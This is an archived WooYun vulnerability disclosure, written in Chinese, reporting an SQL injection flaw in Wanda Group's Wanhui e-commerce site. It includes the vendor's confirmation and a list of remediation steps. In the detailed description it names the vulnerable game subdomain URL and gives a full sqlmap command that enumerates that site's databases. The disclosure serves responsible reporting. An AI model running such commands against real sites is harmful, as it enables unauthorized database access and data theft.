当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045786

漏洞标题:万达集团万汇网(电商平台)SQL注射漏洞

相关厂商:大连万达集团股份有限公司

漏洞作者: 0x334

提交时间:2013-12-13 11:05

修复时间:2014-01-27 11:05

公开时间:2014-01-27 11:05

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-13: 细节已通知厂商并且等待厂商处理中
2013-12-13: 厂商已经确认,细节仅向厂商公开
2013-12-23: 细节向核心白帽子及相关领域专家公开
2014-01-02: 细节向普通白帽子公开
2014-01-12: 细节向实习白帽子公开
2014-01-27: 细节向公众公开

简要描述:

万达集团万汇网SQL注射漏洞,可导致信息泄露、网站被入侵等。
地产开始搞电商,记住安全很重要啊。

详细说明:

万达集团万汇网SQL注射漏洞,可导致信息泄露、网站被入侵等
http://game.wanhui.cn/game_view.php?game_id=3
./sqlmap.py -u "http://game.wanhui.cn/game_view.php?game_id=3" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --dbs

1.jpg


2.jpg

漏洞证明:

如上

修复方案:

1. 所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2. 对进入数据库的特殊字符('"\尖括号&*;等)进行转义处理,或编码转换。
3. 严格限制变量类型,比如整型变量就采用intval()函数过滤,数据库中的存储字段必须对应为int型。
4. 数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
5. 网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
6. 严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
7. 避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
8. 在网站发布之前建议使用一些专业的SQL注入检测工具进行检测,及时修补这些SQL注入漏洞。

版权声明:转载请注明来源 0x334@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-12-13 11:06

厂商回复:

感谢0x334同学的关注与贡献!通知业务部门立即整改!

最新状态:

暂无